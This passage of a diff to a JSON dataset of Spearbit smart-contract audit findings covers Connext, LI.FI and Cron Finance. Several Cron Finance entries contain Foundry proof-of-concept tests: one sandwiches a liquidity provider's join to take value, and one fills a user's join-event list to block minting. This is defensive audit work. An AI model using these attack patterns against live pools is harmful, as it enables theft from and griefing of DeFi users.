_mask)", "labels": [ "Spearbit", - "LIFI-retainer1", + "ConnextNxtp", "Severity: Informational" ] }, { - "title": "Stargate now supports multiple pools for the same token", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The Stargate protocol now supports multiple pools for the same token on the same chain; each pool may be connected to one or many other chains. It is not possible to store a one-to-one token-to-pool mapping.", + "title": "Constants can be used in assembly blocks directly", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Yul cannot read global variables, but that is not true for a constant variable as its value is embedded in the bytecode. Highlighted code above has the following pattern: uint256 _mask = LOW_12_MASK; // assembly can't use globals assembly { // solium-disable-previous-line no-inline-assembly _len := and(shr(24, memView), _mask) } Here, LOW_12_MASK is a constant which can be used directly in assembly code.", "labels": [ "Spearbit", - "LIFI-retainer1", + "ConnextNxtp", "Severity: Informational" ] }, { - "title": "Expose receiver in GenericSwapFacet facet", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "Unlike the bridge facets, the swap facet does not yet emit the receiver of a transaction.", + "title": "Document source of processMessageFromRoot()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The function processMessageFromRoot() of ArbitrumHubConnector doesn't contain a comment where it is derived from. Most other functions have a link to the source.
Linking to the source would make the function easier to verify and maintain.", "labels": [ "Spearbit", - "LIFI-retainer1", + "ConnextNxtp", "Severity: Informational" ] }, { - "title": "Track the destination chain on ServiceFeeCollector", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "ServiceFeeCollector collects gas fees to send to the destination chain. For example: /// @param receiver The address to send gas to on the destination chain function collectTokenGasFees( address tokenAddress, uint256 feeAmount, address receiver ) However, the destination chain is never tracked in the contract.", + "title": "Be aware of zombies", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The function _validateSendRoot() of ArbitrumHubConnector checks that stakerCount and childStakerCount are larger than 0. The definitions of stakerCount and childStakerCount document that they could include zombies. It's not immediately clear what zombies are, but it might be relevant to consider them. contract ArbitrumHubConnector is HubConnector { function _validateSendRoot(...) ... { ... require(node.stakerCount > 0 && node.childStakerCount > 0, \"!staked\"); } } // Number of stakers staked on this node. This includes real stakers and zombies uint64 stakerCount; // Number of stakers staked on a child node. This includes real stakers and zombies uint64 childStakerCount;", "labels": [ "Spearbit", - "LIFI-retainer1", + "ConnextNxtp", "Severity: Informational" ] }, { - "title": "Executor can reuse SwapperV2 functions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "Executor.sol's noLeftOvers and _fetchBalances() are copied from SwapperV2.sol.", + "title": "Readability of proveAndProcess()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The function proveAndProcess() is relatively difficult to understand because it first processes the case of i==0 and then does a loop over i==1..._proofs.length. function proveAndProcess(...) ... { ... bytes32 _messageHash = keccak256(_proofs[0].message); bytes32 _messageRoot = calculateMessageRoot(_messageHash, _proofs[0].path, _proofs[0].index); proveMessageRoot(_messageRoot, _aggregateRoot, _aggregatePath, _aggregateIndex); messages[_messageHash] = MessageStatus.Proven; for (uint32 i = 1; i < _proofs.length; ) { _messageHash = keccak256(_proofs[i].message); bytes32 _calculatedRoot = calculateMessageRoot(_messageHash, _proofs[i].path, _proofs[i].index); require(_calculatedRoot == _messageRoot, \"!sharedRoot\"); messages[_messageHash] = MessageStatus.Proven; unchecked { ++i; } } ... }", "labels": [ "Spearbit", - "LIFI-retainer1", + "ConnextNxtp", "Severity: Informational" ] }, { - "title": "Consider adding onERC1155Received", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "In addition to ERC721, NFTs can be created using the ERC1155 standard. Since the use case of purchasing an NFT has to be supported, support for ERC1155 tokens can be added.", + "title": "Readability of checker()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The function checker() is relatively difficult to read due to the else if chaining of if statements.
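A sketch of the flattened early-return shape this suggests, ahead of the original function quoted below (types and names follow that snippet):

function checker() external view override returns (bool canExec, bytes memory execPayload) {
    bytes32 outboundRoot = CONNECTOR.outboundRoot();
    // Each branch returns, so no else chaining is needed.
    if ((lastExecuted + EXECUTION_INTERVAL) > block.timestamp) {
        return (false, bytes(\"EXECUTION_INTERVAL seconds are not passed yet\"));
    }
    if (lastRootSent == outboundRoot) {
        return (false, bytes(\"Sent root is the same as the current root\"));
    }
    return (true, abi.encodeWithSelector(this.sendMessage.selector, outboundRoot));
}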
As the if statements call return(), the else isn't necessary and the code can be made more readable. function checker() external view override returns (bool canExec, bytes memory execPayload) { bytes32 outboundRoot = CONNECTOR.outboundRoot(); if ((lastExecuted + EXECUTION_INTERVAL) > block.timestamp) { return (false, bytes(\"EXECUTION_INTERVAL seconds are not passed yet\")); } else if (lastRootSent == outboundRoot) { return (false, bytes(\"Sent root is the same as the current root\")); } else { execPayload = abi.encodeWithSelector(this.sendMessage.selector, outboundRoot); return (true, execPayload); } }", "labels": [ "Spearbit", - "LIFI-retainer1", + "ConnextNxtp", "Severity: Informational" ] }, { - "title": "SquidFacet uses a different string encoding library", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "SquidFacet uses an OZ library to convert address to string, whereas the underlying bridge uses a different library. Fuzzing showed that these implementations are equivalent.", + "title": "Use function addressToBytes32", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The function dispatch() of SpokeConnector contains an explicit conversion from address to bytes32. There is also a function addressToBytes32() that does the same and is more readable. function dispatch(...) ... { bytes memory _message = Message.formatMessage( ... bytes32(uint256(uint160(msg.sender))), ... );", "labels": [ "Spearbit", - "LIFI-retainer1", + "ConnextNxtp", "Severity: Informational" ] }, { - "title": "Assembly in StargateFacet can be replaced with Solidity", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The function toBytes() contains assembly code that can also be replaced with Solidity code. Also, see how-to-convert-an-address-to-bytes-in-solidity. function toBytes(address _address) private pure returns (bytes memory) { bytes memory tempBytes; assembly { let m := mload(0x40) _address := and(_address,0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF) mstore(add(m, 20),xor(0x140000000000000000000000000000000000000000, _address) ) mstore(0x40, add(m, 52)) tempBytes := m } return tempBytes; }", + "title": "Balancer Read-Only Reentrancy Vulnerability (Changes from dev team added to audit.)", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "Balancer's read-only reentrancy vulnerability potentially affects the following Cron-Fi TWAMM functions: getVirtualReserves getVirtualPriceOracle executeVirtualOrdersToBlock A mitigation was provided by the Balancer team that uses a minimum amount of gas to trigger a reentrancy check. The Balancer vulnerability is discussed in greater detail here: reentrancy-vulnerability-scope-expanded/4345", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Informational" + "CronFinance", + "Severity: High Risk" ] }, { - "title": "Doublecheck quoteLayerZeroFee()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The function quoteLayerZeroFee uses msg.sender to determine a fee, while _startBridge() uses _bridgeData.receiver to execute router.swap. This might give different results. function quoteLayerZeroFee(...) ... { return router.quoteLayerZeroFee( ...
, toBytes(msg.sender) ); } function _startBridge(...) ... router.swap{ value: _stargateData.lzFee }(..., toBytes(_bridgeData.receiver), ... ); ... }", + "title": "Overpayment of one side of LP Pair onJoinPool due to sandwich or user error", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "Only one of the two incoming tokens is used to determine the amount of pool tokens minted (amountLP) on join: amountLP = Math.min( _token0InU112.mul(supplyLP).divDown(_token0ReserveU112), _token1InU112.mul(supplyLP).divDown(_token1ReserveU112) ); In the event the price moves between the time a minter sends their transaction and when it is included in a block, they may overpay for one of _token0InU112 or _token1InU112. This can occur due to user error, or due to being sandwiched. Concrete example: pragma solidity ^0.7.0; pragma experimental ABIEncoderV2; import \"forge-std/Test.sol\"; import \"../HelperContract.sol\"; import { C } from \"../../Constants.sol\"; import { ExecVirtualOrdersMem } from \"../../Structs.sol\"; contract JoinSandwich is HelperContract { uint256 WAD = 10**18; function testManualJoinSandwich() public { address userA = address(this); address userB = vm.addr(1323); // Add some base liquidity from the future attacker. addLiquidity(pool, userA, userA, 10**7 * WAD, 10**7 * WAD, 0); assertEq(CronV1Pool(pool).balanceOf(userA), 10**7 * WAD - C.MINIMUM_LIQUIDITY); // Give userB some tokens to LP with. token0.transfer(userB, 1_000_000 * WAD); token1.transfer(userB, 1_000_000 * WAD); addLiquidity(pool, userB, userB, 10**6 * WAD, 10**6 * WAD, 0); assertEq(CronV1Pool(pool).balanceOf(userB), 10**6 * WAD); exit(10**6 * WAD, ICronV1Pool.ExitType(0), pool, userB); assertEq(CronV1Pool(pool).balanceOf(userB), 0); // Full amounts are returned b/c the exit penalty has been removed (as is being done anyway). assertEq(token0.balanceOf(userB), 1_000_000 * WAD); assertEq(token1.balanceOf(userB), 1_000_000 * WAD); // Now we'll do the same thing, simulating a sandwich from userA. uint256 swapProceeds = swapPoolAddr(5 * 10**6 * WAD, /* unused */ 0, ICronV1Pool.SwapType(0), address(token0), pool, userA); // Original tx from userB is sandwiched now... addLiquidity(pool, userB, userB, 10**6 * WAD, 10**6 * WAD, 0); // Sell back what was gained from the first swap. swapProceeds = swapPoolAddr(swapProceeds, /* unused */ 0, ICronV1Pool.SwapType(0), address(token1), pool, userA); emit log_named_uint(\"swapProceeds 1 to 0\", swapProceeds); // allows seeing what userA lost to fees // Let's see what poor userB gets back of their million token0 and million token1... assertEq(token0.balanceOf(userB), 0); assertEq(token1.balanceOf(userB), 0); exit(ICronV1Pool(pool).balanceOf(userB), ICronV1Pool.ExitType(0), pool, userB); emit log_named_uint(\"userB token0 after\", token0.balanceOf(userB)); emit log_named_uint(\"userB token1 after\", token1.balanceOf(userB)); } } Output: Logs: swapProceeds 1 to 0: 4845178856516554015932796 userB token0 after: 697176321467715374004199 userB token1 after: 687499999999999999999999 1. We have a pool where the attacker is all of the liquidity (10^7 of each token) 2. An LP tries to deposit another 10^6 in equal proportions 3. The attacker uses a swap of 5 × 10^6 of one of the tokens to distort the pool. They lose about 155k in the process, but the LP loses far more, nearly all of which goes to the attacker--about 615,324 (sum of the losses of the two tokens since they're equally priced in this example).
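To make the mechanism concrete, a rough worked example with round numbers (ignoring swap fees, which is why the figures differ slightly from the test output above): the attacker's swap moves the reserves from 10^7 / 10^7 to roughly R0 = 1.5 × 10^7 and R1 ≈ 6.7 × 10^6 (constant product). With supplyLP = 10^7, the victim's deposit of 10^6 of each token mints min(10^6 × 10^7 / 1.5×10^7, 10^6 × 10^7 / 6.7×10^6) ≈ 6.7 × 10^5 LP tokens: the deposit is priced entirely by the token0 leg, while roughly half of the deposited token1 is effectively donated to the pre-existing LP (the attacker) and recouped by them when they swap back.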
The attacker could be a significantly smaller proportion of the pool and still find this attack profitable. They could also JIT the liquidity since the early withdrawal penalty has been removed. The attack becomes infeasible for very large pools (has to happen over multiple TXs so can't flash loan --need own capital), but is relevant in practice.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Informational" + "CronFinance", + "Severity: High Risk" ] }, { - "title": "Missing modifier refundExcessNative()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The functions swapAndStartBridgeTokensViaXDaiBridge() of GnosisBridgeFacet() and GnosisBridgeL2Facet() don't have the modifier refundExcessNative(), while other facets have such a modifier.", + "title": "Loss of Long-Term Swap Proceeds Likely in Pools With Decimal or Price Imbalances", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "This TWAMM implementation tracks the proceeds of long-term swaps efficiently via accumulated values called \"scaled proceeds\" for each token. In every order block interval (OBI), the scaled proceeds for e.g. the sale of token 0 are incremented by (quantity of token 1 purchased during the OBI) × 2^64 / (sales rate of token 0 during the OBI) Then the proceeds of any specific long-term swap can be computed as the product of the difference between the scaled proceeds at the current block (or the expiration block of the order if filled) and the last block for which proceeds were claimed for the order and the order's sales rate, divided by 2^64: last := min(currentBlock, orderExpiryBlock) prev := block of last proceeds collection, or block order was placed in if this is the first withdrawal LT swap proceeds = (scaledProceeds_last − scaledProceeds_prev) × (order sales rate) / 2^64 The value 2^64 is referred to as the \"scaling factor\" and is intended to reduce precision loss in the division to determine the increment to the scaled proceeds. The addition to increment the scaled proceeds and the subtraction to compute its net change are both intentionally done with unchecked arithmetic--since only the difference matters, so long as at most one overflow occurs between claim-of-proceeds events for any given order, the computed proceeds will be correct (up to rounding errors). If two or more overflows occur, however, funds will be lost by the swapper (unclaimable and locked in the contract). Additionally, to cut down on gas costs, the scaled proceeds for the two tokens are packed into a single storage slot, so that only 128 bits are available for each value. This makes multiple overflows within the lifetime of a single order more likely. The CronFi team was aware of this at the start of the audit and specifically requested it be investigated, though they expected a maximum order length of 5 years to be sufficient to avoid the issue in practice. The scaling factor of 2^64 is approximately 1.8 × 10^19, close to the unit size of an 18-decimal token. It indeed works well if both pool tokens have similar decimals and relative prices that do not differ by too many orders of magnitude, as the quantity purchased and the sales rate will then be of similar magnitude, canceling to within a few powers of ten (2^128 ≈ 3.4 × 10^38, leaving around 19 orders of magnitude after accounting for the scaling factor).
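Stated compactly (a condensation of the computations that follow): with increment = (raw units of token bought per OBI) × 2^64 / (raw-unit sales rate), the 128-bit accumulator first overflows after about 2^128 / increment OBIs, i.e. after roughly blockTime × OBI × 2^128 / increment seconds, and proceeds become unrecoverable once two overflows can occur between consecutive withdrawals of a given order.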
However, in pools with large disparities in price, decimals, or both, numerical issues are easy to encounter. The most extreme, realistic example would be a DAI-GUSD pool. DAI has 18 decimals while GUSD has only 2. We will treat the price of DAI and GUSD as equal for this analysis, as they are both stablecoins, and arbitrage of the TWAMM pool should prevent large deviations. Selling GUSD at a rate of 1000 per block, with an OBI of 64 (the stable pool order block interval in the audited commit) results in an increment of the scaled proceeds per OBI of: increment = (64 * 1000 * 10^18) * 2^64 / (1000 * 10^2) = 1.18 * 10^37 This will overflow an unsigned 128 bit integer after 29 OBIs; at 12 seconds per block, this means the first overflow occurs after 12 * 64 * 29 = 22272 seconds or about 6.2 hours, and thus the first double overflow (and hence irrevocable loss of proceeds if a withdrawal is not executed in time) will occur within about 12.4 hours (slightly but not meaningfully longer if the price is pushed a bit below 1:1, assuming a deep enough pool or reasonably efficient arbitrage). Since the TWAMM is intended to support swaps that take days, weeks, months, or even years to fill, without requiring constant vigilance from every long-term swapper, this is a strong violation of safety. A less extreme but more market-relevant example would be a DAI-WBTC pool. WBTC has 8 instead of 2 decimals, but it is also more than four orders of magnitude more valuable per token than DAI, making it only about 2 orders of magnitude \"safer\" than a DAI-GUSD pool. Imitating the above calculation with 20_000 DAI = 1 WBTC and selling 0.0025 WBTC (~$50) per block with a 257 block OBI yields: increment = (257 * 50 * 10^18) * 2^64 / (0.0025 * 10^8) = 9.48 * 10^35 OBIs to overflow = ceiling(2^128 / (9.48 * 10^35)) = 359 time to overflow = 12 * 257 * 359 = 1107156 seconds = 307 hours = 12.8 days, with the second overflow (and hence irrevocable loss of unclaimed proceeds) following after roughly the same interval again. While less bad than the DAI-GUSD example, this is still likely of significant concern given that the CronFi team indicated these are parameters under which the TWAMM should be able to function safely and DAI-WBTC is a pair of interest for the v1 product. It is worth noting that these calculations are not directly dependent on the quantity being sold so long as the price stays roughly constant--any change in the selling rate will be compensated by a proportional change in the proceeds quantity as their ratio is determined by price. Thus the analysis depends only on relative price and relative decimals, to a good approximation--so a WBTC-DAI pool can be expected to experience an overflow roughly every two weeks at prevailing market prices, so long as the net selling rate is non-zero.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Informational" + "CronFinance", + "Severity: High Risk" ] }, { - "title": "Special case for cfUSDC tokens in CelerIMFacet", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The function startBridgeTokensViaCelerIM() has a special case for cfUSDC tokens, whereas swapAndStartBridgeTokensViaCelerIM() doesn't have this. function startBridgeTokensViaCelerIM(...) ... { if (!LibAsset.isNativeAsset(_bridgeData.sendingAssetId)) { if (...) { // special case for cfUSDC token asset = IERC20(CelerToken(_bridgeData.sendingAssetId).canonical()); } else { ... } } ...
} function swapAndStartBridgeTokensViaCelerIM(...) ... { ... if (!LibAsset.isNativeAsset(_bridgeData.sendingAssetId)) { // no special case for cfUSDC token } ... }", + "title": "An attacker can block any address from joining the Pool and minting BLP Tokens by filling the joinEventMap mapping.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "An attacker can block any address from minting BLP Tokens. This occurs due to the MAX_JOIN_EVENTS limit, which is present in the JoinEventLib library. The goal for an attacker is to block a legitimate user from minting BLP Tokens, by filling the joinEventMap mapping. The attacker can fill the joinEventMap mapping by performing the following steps: The attacker mints BLP Tokens from 50 different addresses. Each address transfers the BLP Tokens, alongside the join events, to the targeted user with a call to the CronV1Pool(pool).transfer and CronV1Pool(pool).transferJoinEvent functions respectively. Those transfers should happen in different blocks. After 50 blocks (50 * 12s = 10 minutes) the attacker has blocked the legitimate user from minting BLP Tokens, as the maximum size of the joinEventMap mapping has been reached. The impact of this vulnerability can be significant, particularly for smart contracts that allow users to earn yield by providing liquidity in third-party protocols. For example, if a governance proposal is initiated to generate yield by providing liquidity in a CronV1Pool pool, the attacker could prevent the third-party protocol from integrating with the CronV1Pool protocol. A proof-of-concept exploit demonstrating this vulnerability can be found below: function testGriefingAttack() public { console.log(\"-----------------------------\"); console.log(\"Many Users mint BLP tokens and transfer the join events to the user 111 in order to fill the array!\"); for (uint j = 1; j < 51; j++) { _addLiquidity(pool, address(j), address(j), 2_000, 2_000, 0); vm.warp(block.timestamp + 12); vm.startPrank(address(j)); //transfer the tokens CronV1Pool(pool).transfer(address(111), CronV1Pool(pool).balanceOf(address(j))); //transfer the join events to the address(111) CronV1Pool(pool).transferJoinEvent(address(111), 0 , CronV1Pool(pool).balanceOf(address(j))); vm.stopPrank(); } console.log(\"Balance of address(111) before minting LP Tokens himself\", ICronV1Pool(pool).balanceOf(address(111))); //user(111) wants to enter the pool _addLiquidity(pool, address(111), address(111), 5_000, 5_000, 0); console.log(\"Join Events of user address(111): \", ICronV1Pool(pool).getJoinEvents(address(111)).length); console.log(\"Balance of address(111) after adding the liquidity: \", ICronV1Pool(pool).balanceOf(address(111))); }", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Informational" + "CronFinance", + "Severity: High Risk" ] }, { - "title": "External calls of SquidFacet", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The functions CallBridge and CallBridgeCall make arbitrary external calls. This is done via a separate multicall contract, SquidMulticall. This might be used to try reentrancy attacks. function _startBridge(...) ... { ... squidRouter.bridgeCall{ value: msgValue }(...); ... squidRouter.callBridgeCall{ value: msgValue }(...); ...
}", + "title": "The executeVirtualOrdersToBlock function updates the oracle with the wrong block.number", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "The executeVirtualOrdersToBlock is external, meaning anyone can call this function to execute virtual orders. The _maxBlock parameter can be lower block.number which will make the oracle malfunction as the oracle update function _updateOracle uses the block.timestamp and assumes that the update was called with the reserves at the current block. This will make the oracle update with an incorrect value when _maxBlock can be lower than block.number.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Informational" + "CronFinance", + "Severity: High Risk" ] }, { - "title": "Missing test coverage for triggerRefund Function", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The current test suite does not include test cases for the triggerRefund function. This oversight may lead to undetected bugs or unexpected behavior in the function's implementation.", + "title": "The _join function does not check if the recipient is address(0)", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "As stated within the Balancer's PoolBalances.sol // The Vault ignores the `recipient` in joins and the `sender` in exits: it is up to the Pool to keep track of ,! // their participation. The recipient is not checked if it's the address(0), that should happen within the pool implementation. Within the Cron implementation, this check is missing which can cause losses of LPs if the recipient is sent as address(0). This can have a high impact if a 3rd party integration happens with the Cron pool and the \"joiner\" is mistakenly sending an address(0). This becomes more dangerous if the 3rd party is a smart contract implementation that connects with the Cron pool, as the default value for an address is the address(0), so the probability of this issue occurring increases.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Informational" + "CronFinance", + "Severity: Low Risk" ] }, { - "title": "Implicit assumption in MakerTeleportFacet", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The function _startBridge() of MakerTeleportFacet has the implicit assumption that dai is an ERC20 token. However on GnosisChain the native asset is (x)dai. Note: DAI on GnosisChain is an ERC20, so unlikely this would be a problem in practice. function _startBridge(ILiFi.BridgeData memory _bridgeData) internal { LibAsset.maxApproveERC20( IERC20(dai),...); ... }", + "title": "Canonical token pairs can be griefed by deploying new pools with malicious admins", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "function create( address _token0, address _token1, string memory _name, string memory _symbol, uint256 _poolType, address _pauser ) external returns (address) { CronV1Pool.PoolType poolType = CronV1Pool.PoolType(_poolType); requireErrCode(_token0 != _token1, CronErrors.IDENTICAL_TOKEN_ADDRESSES); (address token0, address token1) = _token0 < _token1 ? 
(_token0, _token1) : (_token1, _token0); requireErrCode(token0 != address(0), CronErrors.ZERO_TOKEN_ADDRESSES); requireErrCode(getPool[token0][token1][_poolType] == address(0), CronErrors.EXISTING_POOL); address pool = address( new CronV1Pool(IERC20(_token0), IERC20(_token1), getVault(), _name, _symbol, poolType, address(this), _pauser) ); //... Anyone can permissionlessly deploy a pool, with it then becoming the canonical pool for that pair of tokens. An attacker is able to pass a malicious _pauser to the twamm pool, preventing the creation of a legitimate pool of the same type and tokens. This results in race conditions between altruistic and malicious pool deployers to set the admin for every token pair. Malicious actors may grief the protocol by deploying pools for token pairs and exploiting the admin address: deploying the pool in a paused state, effectively disabling trading for long-term swaps with the pool, pausing the pool at an unknown point in the future, setting fee and holding penalty parameters to inappropriate values, or setting illegitimate arbitrage partners and lists. This requires the factory owner to remove the admin of each pool individually and to set a new admin address, fee parameters, holding periods, pause state, and arbitrage partners in order to recover each pool to a usable condition if the griefing is successful.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Informational" + "CronFinance", + "Severity: Low Risk" ] }, { - "title": "Robust allowance handling in maxApproveERC20()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "Some tokens, like USDT, require setting the approval to 0 before setting it to another value. The function SafeERC20.safeIncreaseAllowance() doesn't do this. Luckily maxApproveERC20() sets the allowance so high that in practice this never has to be increased. function maxApproveERC20(...) ... { ... uint256 allowance = assetId.allowance(address(this), spender); if (allowance < amount) SafeERC20.safeIncreaseAllowance(IERC20(assetId), spender, MAX_UINT - allowance); }", + "title": "Refund Computation in _withdrawLongTermSwap Contains A Risky Underflow", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "Nothing prevents lastVirtualOrderBlock from advancing beyond the expiry of any given long-term swap, so the unchecked subtraction here is unsafe and can underflow. Since the resulting refund value will be extremely large due to the limited number of blocks that can elapse and the typical prices and decimals of tokens, the practical consequence will be a revert due to exceeding the pool and order balances. However, this could be used to steal funds if the value could be maliciously tuned, for example via another hypothetical bug that allowed the last virtual order block or the sales rate of an order to be manipulated to an arbitrary value.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Informational" + "CronFinance", + "Severity: Low Risk" ] }, { - "title": "Unused re-entrancy guard", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The RelayerCelerIM.sol#L21 includes a redundant re-entrancy guard, which would add an extra layer of protection against re-entrancy attacks.
While re-entrancy guards are crucial for securing contracts, this particular guard is not used.", + "title": "Function transferJoinEvent Permits Transfer-to-Self", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "Though the error code indicates the opposite intent, this check will permit transfer-to-self (|| used instead of &&).", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Informational" + "CronFinance", + "Severity: Low Risk" ] }, { - "title": "Redundant duplicate import in the LIFuelFacet", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The current LIFuelFacet.sol contains a redundant duplicate import. Identifying and removing duplicate imports can streamline the contract and improve maintainability.", + "title": "One-step owner change for factory owner", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "The factory owner can be changed with a single transaction. As the factory owner is critical to managing the pool fees and other settings, an incorrect address being set as the owner may result in unintended behaviors.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Informational" + "CronFinance", + "Severity: Low Risk" ] }, { - "title": "Extra checks in executeMessageWithTransfer()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The function executeMessageWithTransfer() of RelayerCelerIM ignores the first parameter. It seems this could be used to verify the origin of the transaction, which could be an extra security measure. * @param * (unused) The address of the source app contract function executeMessageWithTransfer(address, ...) ... { }", + "title": "Factory owner may front run large orders in order to extract fees", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "The factory owner may be able to front-run large trades in order to extract more fees if it is compromised or becomes malicious in one way or another. Similarly, pausing may also allow for skipping the execution of virtual orders before exiting.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Informational" + "CronFinance", + "Severity: Low Risk" ] }, { - "title": "Variable visibility is not uniform", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "In the current facets, state variables like router/messenger visibilities are not uniform, with some variables declared as public while others are private. thorchainRouter => is defined as public. synapseRouter => is defined as public. deBridgeGate => is defined as private", + "title": "Join Events must be explicitly transferred to recipient after transferring Balancer Pool Tokens in order to realize the full value of the tokens", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "Any user receiving LP tokens must also explicitly be transferred a matching join event in order to redeem the full value of the LP tokens on exit; otherwise the receiving address will automatically incur the holding penalty when it tries to exit the pool.
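For illustration, a hedged sketch of the two calls an integrator would have to make; the interface is reduced to the two functions exercised in the griefing PoC above, and the join-event index 0 (the sender's oldest join event) is an assumption:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Reduced interface -- only the two calls referenced in this report.
interface ICronV1PoolLP {
    function transfer(address to, uint256 amount) external returns (bool);
    function transferJoinEvent(address to, uint256 index, uint256 amount) external;
}

// Hedged sketch: forwarding LP tokens without the matching join event leaves
// the recipient exposed to the holding penalty on exit.
contract LpForwarder {
    function forward(ICronV1PoolLP pool, address to, uint256 amount) external {
        pool.transfer(to, amount);             // moves the BLP balance only
        pool.transferJoinEvent(to, 0, amount); // index 0 = oldest join event (assumption)
    }
}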
Unless a protocol specifically implements transferJoinEvent compatibility, all LP tokens going through that protocol will be worth a fraction of their true value even after the holding period has elapsed.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Informational" + "CronFinance", + "Severity: Low Risk" ] }, { - "title": "Library LibMappings not used everywhere", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The library LibMappings is used in several facets. However, it is not used in the following facets ReentrancyGuard AxelarFacet HopFacet.sol MultichainFacet OptimismBridgeFacet OwnershipFacet", + "title": "Order Block Intervals (OBI) and Max Intervals are calculated with 14 second instead of 12 second block times", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", + "body": "The CronV1Pool contract calculates both the Order Block Intervals (OBI) and the Max Intervals of the Stable/Liquid/Volatile pairs with 14 second block times. However, after the Merge, a 12 second block time is enforced by the Beacon Chain.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Informational" + "CronFinance", + "Severity: Low Risk" ] }, { - "title": "transferERC20() doesn't have a null address check for receiver", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "LibAsset.transferFromERC20() has a null address check on the receiver, but transferERC20() does not.", + "title": "One-step status change for pool Admins", + "html_url": 